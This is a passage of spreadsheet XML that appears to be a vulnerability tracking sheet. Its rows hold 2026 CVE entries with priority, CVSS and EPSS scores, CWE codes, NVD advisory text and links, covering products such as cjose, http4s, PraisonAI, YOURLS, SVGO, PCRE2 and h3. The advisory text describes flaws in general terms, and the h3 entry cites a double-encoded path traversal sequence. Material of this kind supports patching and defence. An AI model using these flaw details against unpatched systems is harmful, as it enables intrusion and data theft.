          <t>nvidia:dgx_spark, nvidia:dgx_spark_uefi</t>
        </is>
      </c>
      <c r="L335" s="5" t="inlineStr"/>
      <c r="M335" s="5" t="inlineStr"/>
      <c r="N335" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O335" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P335" s="5" t="inlineStr"/>
      <c r="Q335" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R335" s="5" t="inlineStr">
        <is>
          <t>NVIDIA DGX Spark contains a vulnerability in the system firmware, where a privileged attacker could be able to cause an out-of-bounds write. A successful exploit of this vulnerability may lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="S335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47626</t>
        </is>
      </c>
    </row>
    <row r="336">
      <c r="A336" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B336" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53761</t>
        </is>
      </c>
      <c r="D336" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E336" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F336" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G336" s="5" t="inlineStr"/>
      <c r="H336" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I336" s="5" t="inlineStr"/>
      <c r="J336" s="5" t="inlineStr"/>
      <c r="K336" s="5" t="inlineStr"/>
      <c r="L336" s="5" t="inlineStr"/>
      <c r="M336" s="5" t="inlineStr"/>
      <c r="N336" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O336" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P336" s="5" t="inlineStr"/>
      <c r="Q336" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R336" s="5" t="inlineStr">
        <is>
          <t>Frappe CRM is an open-source customer relationship management tool. Prior to version 1.73.0, there is an authentication bypass vulnerability via logged invitation keys in crm/api. This issue has been patched in version 1.73.0.</t>
        </is>
      </c>
      <c r="S336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53761</t>
        </is>
      </c>
    </row>
    <row r="337">
      <c r="A337" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B337" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53938</t>
        </is>
      </c>
      <c r="D337" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E337" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F337" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G337" s="5" t="inlineStr"/>
      <c r="H337" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I337" s="5" t="inlineStr"/>
      <c r="J337" s="5" t="inlineStr"/>
      <c r="K337" s="5" t="inlineStr"/>
      <c r="L337" s="5" t="inlineStr"/>
      <c r="M337" s="5" t="inlineStr"/>
      <c r="N337" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O337" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P337" s="5" t="inlineStr"/>
      <c r="Q337" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="R337" s="5" t="inlineStr">
        <is>
          <t>OpenIDC/cjose is a C library implementing the Javascript Object Signing and Encryption (JOSE). Prior to version 0.6.2.5, cjose's JWE decryption path for the AES Key Wrap key-management algorithms (`alg` = `A128KW`, `A192KW`, `A256KW`) does not validate the length of the attacker-supplied `encrypted_key` (JWE Encrypted Key) before unwrapping it into a fixed-size, heap-allocated Content Encryption Key (CEK) buffer. A remote, unauthenticated attacker who can submit a crafted JWE to an application that decrypts it with an AES-KW symmetric key can trigger an out-of-bounds heap write, corrupting the heap. This leads at minimum to a crash (denial of service) and, depending on the heap layout and allocator, may be leverageable for further memory-corruption impact. `cjose_jwe_import()` / `cjose_jwe_decrypt()` are pre-authentication entry points: they parse and process fully attacker-controlled input. Upgrade to cjose 0.6.2.5 to receive a patch. If upgrading is not immediately possible, reject the AES Key Wrap algorithms (`A128KW`/`A192KW`/`A256KW`) for untrusted JWEs at the application layer.</t>
        </is>
      </c>
      <c r="S337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53938</t>
        </is>
      </c>
    </row>
    <row r="338">
      <c r="A338" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B338" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54556</t>
        </is>
      </c>
      <c r="D338" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E338" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F338" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G338" s="5" t="inlineStr"/>
      <c r="H338" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I338" s="5" t="inlineStr"/>
      <c r="J338" s="5" t="inlineStr"/>
      <c r="K338" s="5" t="inlineStr"/>
      <c r="L338" s="5" t="inlineStr"/>
      <c r="M338" s="5" t="inlineStr"/>
      <c r="N338" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O338" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P338" s="5" t="inlineStr"/>
      <c r="Q338" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="R338" s="5" t="inlineStr">
        <is>
          <t>Http4s is a Scala interface for HTTP services. Prior to 0.23.35 and 1.0.0-M47, an unauthenticated HTTP/2 peer can cause an out-of-memory denial of service in the Ember backend with HTTP/2 enabled. The Hpack wrapper in ember-core/shared/src/main/scala/org/http4s/ember/core/h2/Hpack.scala concatenates HEADERS and CONTINUATION frame fragments and decodes them into a single List, but maxHeaderSize accounting does not include indexed headers or HPACK per-header overhead. A small compressed header block can therefore expand into a much larger decoded representation that remains in memory for processing. Servers exposed to untrusted HTTP/2 traffic and clients directed to an untrusted HTTP/2 server are affected, and concurrent malicious connections can exhaust the process heap. This issue is fixed in versions 0.23.35 and 1.0.0-M47.</t>
        </is>
      </c>
      <c r="S338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54556</t>
        </is>
      </c>
    </row>
    <row r="339">
      <c r="A339" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B339" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55528</t>
        </is>
      </c>
      <c r="D339" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E339" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F339" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G339" s="5" t="inlineStr"/>
      <c r="H339" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I339" s="5" t="inlineStr"/>
      <c r="J339" s="5" t="inlineStr"/>
      <c r="K339" s="5" t="inlineStr"/>
      <c r="L339" s="5" t="inlineStr"/>
      <c r="M339" s="5" t="inlineStr"/>
      <c r="N339" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O339" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P339" s="5" t="inlineStr"/>
      <c r="Q339" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-862</t>
        </is>
      </c>
      <c r="R339" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonaiagents 1.6.58, AgentServer exposes ServerConfig.auth_token but AgentServer._create_app does not check it on any route. A remote caller can subscribe, publish, and perform other actions without a valid bearer token or X-Auth-Token even when authentication is configured. This issue is fixed in version 1.6.58.</t>
        </is>
      </c>
      <c r="S339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55528</t>
        </is>
      </c>
    </row>
    <row r="340">
      <c r="A340" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B340" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55533</t>
        </is>
      </c>
      <c r="D340" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E340" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F340" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G340" s="5" t="inlineStr"/>
      <c r="H340" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I340" s="5" t="inlineStr"/>
      <c r="J340" s="5" t="inlineStr"/>
      <c r="K340" s="5" t="inlineStr"/>
      <c r="L340" s="5" t="inlineStr"/>
      <c r="M340" s="5" t="inlineStr"/>
      <c r="N340" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O340" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P340" s="5" t="inlineStr"/>
      <c r="Q340" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="R340" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.58, create_auth_middleware() allows requests when auth=api-key lacks PRAISONAI_API_KEY or JWT authentication lacks PRAISONAI_JWT_SECRET. An externally bound Recipe server can therefore accept unauthenticated POST /v1/recipes/run requests despite authentication being enabled. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="S340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55533</t>
        </is>
      </c>
    </row>
    <row r="341">
      <c r="A341" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B341" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55571</t>
        </is>
      </c>
      <c r="D341" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E341" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F341" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G341" s="5" t="inlineStr"/>
      <c r="H341" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I341" s="5" t="inlineStr"/>
      <c r="J341" s="5" t="inlineStr"/>
      <c r="K341" s="5" t="inlineStr"/>
      <c r="L341" s="5" t="inlineStr"/>
      <c r="M341" s="5" t="inlineStr"/>
      <c r="N341" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O341" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P341" s="5" t="inlineStr"/>
      <c r="Q341" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-306</t>
        </is>
      </c>
      <c r="R341" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to 1.0.4, LiveViewConsumer.handle_mount sends a `{"type":"navigate","to":...}` frame when login_required, permission_required, or a redirecting on_mount hook denies a LiveView mount, but returns without closing the WebSocket or clearing self.view_instance. A browser follows the redirect, but a raw WebSocket client can ignore it and retain the mounted socket. Because LiveViewConsumer.handle_event does not recheck authentication or authorization, the client can send `{"type":"event",...}` frames that invoke @event_handler methods without an authenticated session, including through handle_live_redirect_mount, enabling unauthorized sensitive reads or mutations. This issue is fixed in version 1.0.4.</t>
        </is>
      </c>
      <c r="S341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55571</t>
        </is>
      </c>
    </row>
    <row r="342">
      <c r="A342" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B342" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63135</t>
        </is>
      </c>
      <c r="D342" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E342" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F342" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G342" s="5" t="inlineStr"/>
      <c r="H342" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I342" s="5" t="inlineStr"/>
      <c r="J342" s="5" t="inlineStr"/>
      <c r="K342" s="5" t="inlineStr"/>
      <c r="L342" s="5" t="inlineStr"/>
      <c r="M342" s="5" t="inlineStr"/>
      <c r="N342" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O342" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P342" s="5" t="inlineStr"/>
      <c r="Q342" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R342" s="5" t="inlineStr">
        <is>
          <t>YOURLS is a self-hosted, customizable URL shortener written in PHP. From 1.5.1 until 1.10.4, YOURLS stores the HTTP Referer header through yourls_get_referrer(), yourls_sanitize_url_safe(), and yourls_log_redirect(), then aggregates the value in yourls-infos.php and passes the derived domain through yourls_get_domain(), yourls_stats_pie(), and yourls_google_array_to_data_table(). The chart builder concatenates labels into inline JavaScript without JavaScript-string escaping, so an unauthenticated attacker can poison the statistics of an existing short URL with a crafted referrer. When an administrator or public stats-page viewer opens the affected statistics page, attacker-controlled JavaScript executes in the YOURLS origin and can access admin-visible data, the API signature token, and privileged same-origin actions. This issue is fixed in version 1.10.4.</t>
        </is>
      </c>
      <c r="S342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63135</t>
        </is>
      </c>
    </row>
    <row r="343">
      <c r="A343" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B343" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63376</t>
        </is>
      </c>
      <c r="D343" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E343" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F343" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G343" s="5" t="inlineStr"/>
      <c r="H343" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I343" s="5" t="inlineStr"/>
      <c r="J343" s="5" t="inlineStr"/>
      <c r="K343" s="5" t="inlineStr"/>
      <c r="L343" s="5" t="inlineStr"/>
      <c r="M343" s="5" t="inlineStr"/>
      <c r="N343" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O343" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P343" s="5" t="inlineStr"/>
      <c r="Q343" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="R343" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">toml-node </t>
        </is>
      </c>
      <c r="S343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63376</t>
        </is>
      </c>
    </row>
    <row r="344">
      <c r="A344" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B344" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6485</t>
        </is>
      </c>
      <c r="D344" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E344" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F344" s="5" t="inlineStr">
        <is>
          <t>8338d8cb-57f7-4252-abc0-96fd13e98d21</t>
        </is>
      </c>
      <c r="G344" s="5" t="inlineStr"/>
      <c r="H344" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I344" s="5" t="inlineStr"/>
      <c r="J344" s="5" t="inlineStr"/>
      <c r="K344" s="5" t="inlineStr"/>
      <c r="L344" s="5" t="inlineStr"/>
      <c r="M344" s="5" t="inlineStr"/>
      <c r="N344" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O344" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P344" s="5" t="inlineStr"/>
      <c r="Q344" s="5" t="inlineStr">
        <is>
          <t>CWE-489</t>
        </is>
      </c>
      <c r="R344" s="5" t="inlineStr">
        <is>
          <t>UEFI BIOS embedded Shell could be used to bypass Secure Boot via shell commands or startup scripts.</t>
        </is>
      </c>
      <c r="S344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6485</t>
        </is>
      </c>
    </row>
    <row r="345">
      <c r="A345" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B345" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77358</t>
        </is>
      </c>
      <c r="D345" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E345" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F345" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G345" s="5" t="inlineStr"/>
      <c r="H345" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I345" s="5" t="inlineStr"/>
      <c r="J345" s="5" t="inlineStr"/>
      <c r="K345" s="5" t="inlineStr"/>
      <c r="L345" s="5" t="inlineStr"/>
      <c r="M345" s="5" t="inlineStr"/>
      <c r="N345" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O345" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P345" s="5" t="inlineStr"/>
      <c r="Q345" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R345" s="5" t="inlineStr">
        <is>
          <t>cpp-httplib is a C++ header-only HTTP/HTTPS library. In versions 0.33.0 through 0.50.0, the TLS-enabled WebSocket client frees the TLS session before closing the WebSocket that still uses it, producing a use-after-free. In WebSocketClient::shutdown_and_close the SSL object is freed and the pointer cleared, but the subsequent WebSocket close still sends a close frame through the SSL socket stream, which holds a raw copy of the now-dangling session pointer and reads from and writes to the freed memory. The same freed-then-used ordering is reachable through the client's destructor and its connect path, so ordinary teardown of a secure WebSocket connection triggers the defect. This issue is fixed in version 0.50.1.</t>
        </is>
      </c>
      <c r="S345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77358</t>
        </is>
      </c>
    </row>
    <row r="346">
      <c r="A346" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B346" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78491</t>
        </is>
      </c>
      <c r="D346" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E346" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F346" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G346" s="5" t="inlineStr"/>
      <c r="H346" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I346" s="5" t="inlineStr"/>
      <c r="J346" s="5" t="inlineStr"/>
      <c r="K346" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L346" s="5" t="inlineStr"/>
      <c r="M346" s="5" t="inlineStr"/>
      <c r="N346" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O346" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P346" s="5" t="inlineStr"/>
      <c r="Q346" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R346"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346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78491</t>
        </is>
      </c>
    </row>
    <row r="347">
      <c r="A347" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B347" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84370</t>
        </is>
      </c>
      <c r="D347" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E347" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F347" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G347" s="5" t="inlineStr"/>
      <c r="H347" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I347" s="5" t="inlineStr"/>
      <c r="J347" s="5" t="inlineStr"/>
      <c r="K347" s="5" t="inlineStr"/>
      <c r="L347" s="5" t="inlineStr"/>
      <c r="M347" s="5" t="inlineStr"/>
      <c r="N347" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O347" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P347" s="5" t="inlineStr"/>
      <c r="Q347" s="5" t="inlineStr">
        <is>
          <t>CWE-184, CWE-79</t>
        </is>
      </c>
      <c r="R347" s="5" t="inlineStr">
        <is>
          <t>SVGO, short for SVG Optimizer, is a Node.js library and command-line application for optimizing SVG files. From version 1.0.0 until versions 2.8.4, 3.3.5, and 4.1.0, the opt-in removeScripts plugin, named removeScriptElement in versions 2 and 3, incompletely filters executable links in plugins/removeScripts.js and lib/svgo/tools.js. The plugin does not recognize namespace-prefixed SVG anchor elements such as svg:a with href or namespaced *:href values, and it does not remove ASCII tab, line-feed, or carriage-return characters before checking URL schemes. Browsers remove those characters before parsing a scheme, allowing an executable link to pass the plugin's check. When an application processes attacker-controlled SVG input and serves the result in an active browser context, a victim who activates the surviving link can execute script in the SVG's origin, expose data, modify content, or perform actions as the victim. This issue is fixed in versions 2.8.4, 3.3.5, and 4.1.0.</t>
        </is>
      </c>
      <c r="S347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84370</t>
        </is>
      </c>
    </row>
    <row r="348">
      <c r="A348" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B348" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85730</t>
        </is>
      </c>
      <c r="D348" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E348" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F348" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G348" s="5" t="inlineStr"/>
      <c r="H348" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I348" s="5" t="inlineStr"/>
      <c r="J348" s="5" t="inlineStr"/>
      <c r="K348" s="5" t="inlineStr"/>
      <c r="L348" s="5" t="inlineStr">
        <is>
          <t>npm:smol-toml</t>
        </is>
      </c>
      <c r="M348" s="5" t="inlineStr">
        <is>
          <t>1.7.1</t>
        </is>
      </c>
      <c r="N348" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O348" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P348" s="5" t="inlineStr"/>
      <c r="Q348" s="5" t="inlineStr">
        <is>
          <t>CWE-606, CWE-835</t>
        </is>
      </c>
      <c r="R348" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">smol-toml </t>
        </is>
      </c>
      <c r="S348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85730</t>
        </is>
      </c>
    </row>
    <row r="349">
      <c r="A349" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B349" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86145</t>
        </is>
      </c>
      <c r="D349" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E349" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F349" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G349" s="5" t="inlineStr"/>
      <c r="H349" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I349" s="5" t="inlineStr"/>
      <c r="J349" s="5" t="inlineStr"/>
      <c r="K349" s="5" t="inlineStr"/>
      <c r="L349" s="5" t="inlineStr"/>
      <c r="M349" s="5" t="inlineStr"/>
      <c r="N349" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O349" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P349" s="5" t="inlineStr"/>
      <c r="Q349" s="5" t="inlineStr">
        <is>
          <t>CWE-424</t>
        </is>
      </c>
      <c r="R349" s="5" t="inlineStr">
        <is>
          <t>PCRE2 before 10.48 allows a pcre2_dfa_match out-of-bounds write because reuse of a cached workspace block, in a recursive DFA matching workspace, lacks a size check (even though a newly allocated block, for the same purpose, does have a size check). This outcome requires an attacker-controlled regular expression, or a recursive pattern in conjunction with a small heap limit (this can be set through the API).</t>
        </is>
      </c>
      <c r="S349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86145</t>
        </is>
      </c>
    </row>
    <row r="350">
      <c r="A350" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B350" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86251</t>
        </is>
      </c>
      <c r="D350" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E350" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F350" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G350" s="5" t="inlineStr"/>
      <c r="H350" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I350" s="5" t="inlineStr"/>
      <c r="J350" s="5" t="inlineStr"/>
      <c r="K350" s="5" t="inlineStr"/>
      <c r="L350" s="5" t="inlineStr"/>
      <c r="M350" s="5" t="inlineStr"/>
      <c r="N350" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O350" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P350" s="5" t="inlineStr"/>
      <c r="Q350" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R350" s="5" t="inlineStr">
        <is>
          <t>h3 versions before 1.15.9 contain a path traversal vulnerability in the serveStatic utility. A double-decoding flaw allows a request path containing double-encoded dot sequences (e.g. %252e%252e) to be decoded to %2e%2e, which survives resolveDotSegments() because that function only checks for literal '.' characters. When the resulting asset ID is resolved by URL-based backends (CDN, S3, object storage), %2e%2e is interpreted as '..' per RFC 3986, enabling path traversal to read arbitrary files from the backend.</t>
        </is>
      </c>
      <c r="S350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86251</t>
        </is>
      </c>
    </row>
    <row r="351">
      <c r="A351" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B351" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86297</t>
        </is>
      </c>
      <c r="D351" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E351" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F351" s="5" t="inlineStr">
